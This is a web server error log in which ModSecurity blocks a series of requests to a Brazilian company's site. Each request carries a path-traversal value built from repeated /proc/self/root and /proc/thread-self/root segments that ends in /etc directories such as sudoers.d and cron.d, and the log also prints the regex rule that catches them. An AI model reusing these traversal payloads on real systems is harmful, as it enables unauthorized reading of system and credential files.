[Mon Mar 16 18:07:35.469483 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.241.46:60400] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxF46lpbStxTqkSkuFAQAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:37.878488 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.241.46:60416] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxGaQpVkWug9HeOt9PrAAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:40.215553 2026] [:error] [pid 15061:tid 140411691570944] [client 74.7.241.46:52026] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxHKTCbgAP5jq5TehHuQAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:46.019643 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.241.46:52040] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxIrABkC4fWIHEf8ETQwAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:48.439369 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.241.46:52044] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxJNSswJuvopo3lOh8XgAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:51.995594 2026] [:error] [pid 15568:tid 140411557287680] [client 74.7.241.46:56570] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxJ6QpVkWug9HeOt9PsAAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:07:55.680423 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.241.46:56586] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxK9SswJuvopo3lOh8YQAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:08:11.859814 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.241.46:35412] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxO1ajLEzk2WiQ-10ufQAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:08:48.467154 2026] [:error] [pid 29802:tid 140411699963648] [client 74.7.241.46:55610] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxYM_BxrYCr4hPDw8GWQAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:08:48.542240 2026] [:error] [pid 15061:tid 140411607643904] [client 74.7.243.203:44822] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxYKTCbgAP5jq5TehHygAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:08:53.904930 2026] [:error] [pid 29507:tid 140411540502272] [client 74.7.243.203:49348] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxZUr9dMAiw-8KANNk_AAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:08:53.905232 2026] [mime_magic:error] [pid 29507:tid 140411540502272] (70014)End of file found: [client 74.7.243.203:49348] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:09:02.542491 2026] [:error] [pid 15568:tid 140411649607424] [client 74.7.241.46:50254] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxbqQpVkWug9HeOt9PzwAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:09:09.249476 2026] [:error] [pid 15061:tid 140411565680384] [client 74.7.241.46:43206] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxdaTCbgAP5jq5TehH1AAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:09:10.600366 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.241.46:53576] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxdrABkC4fWIHEf8ETyQAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:09:11.786143 2026] [:error] [pid 29507:tid 140411607643904] [client 74.7.241.46:53592] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxd0r9dMAiw-8KANNlAAAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:09:13.128239 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.241.46:53606] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxedSswJuvopo3lOh8bgAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:09:14.342990 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.241.46:53614] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxetSswJuvopo3lOh8cAAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:09:15.657062 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.241.46:53624] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxe9SswJuvopo3lOh8cQAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:09:17.022806 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.241.46:53636] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxfbysWC90G-1nBrBg7AAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:09:21.405901 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.241.46:37488] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxgf9ocpUE4ed4uDwPgwAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:09:23.779097 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.241.46:37496] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhxg46lpbStxTqkSkuFCwAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
